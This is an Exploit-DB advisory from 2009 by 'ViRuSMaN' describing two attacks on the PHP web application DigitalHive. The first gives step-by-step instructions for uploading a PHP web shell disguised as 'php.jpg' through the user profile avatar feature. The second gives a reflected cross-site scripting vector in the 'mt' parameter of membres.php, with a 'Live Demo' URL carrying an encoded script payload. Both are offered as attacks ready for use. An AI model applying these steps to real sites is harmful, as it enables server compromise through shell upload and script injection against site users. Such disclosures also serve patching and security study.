Digital Hive - Multiple Vulnerabilities

EDB-ID:

10427

Author:

ViRuSMaN

Type:

webapps

Platform:

Linux

Published:

2009-12-14

[-]##############################################################
|
| DigitalHive Remote File Upload Vulnerability
|
| Author : ViRuSMaN
|
| Contact : v.-m@live.com
|
| Home : Islam-Attack.CoM , HackTeach.OrG
|
| Download :http://www.digitalhive.com/base.php?page=site/telechargements.php&var=accueil
[-]##############################################################
|
| Exp:
|
| 1- First signup in the forum by going here http://localhost/[script]/base.php?page=inscription.php
|
|
| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier"
|
|
| 3-Now upload your shell in "php.jpg" format
|
|
| 4-Finally do a right click in the icon situated in "Apparence" then copy the link of your shell.
|
[-]#############################################################
|
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's
|
[-]#############################################################

==============================================================================
        [»] DigitalHive Multiple Vulnerabilities
==============================================================================

    [»] Script:             [ DigitalHive ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ Hive est systeme permettant de creer facilement et rapidement un systeme ]
    [»] Download:           [ http://www.digitalhive.com/base.php?page=site/telechargements.php&var=dl&num=17 ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Sec-Attack.Com ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

        [»] http://server/[path]/base.php?page=membres.php&mt=[Xss Vuln]

===[ Live Demo ]===

    [»] http://server/base.php?page=membres.php&mt=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

Author: ViRuSMaN <-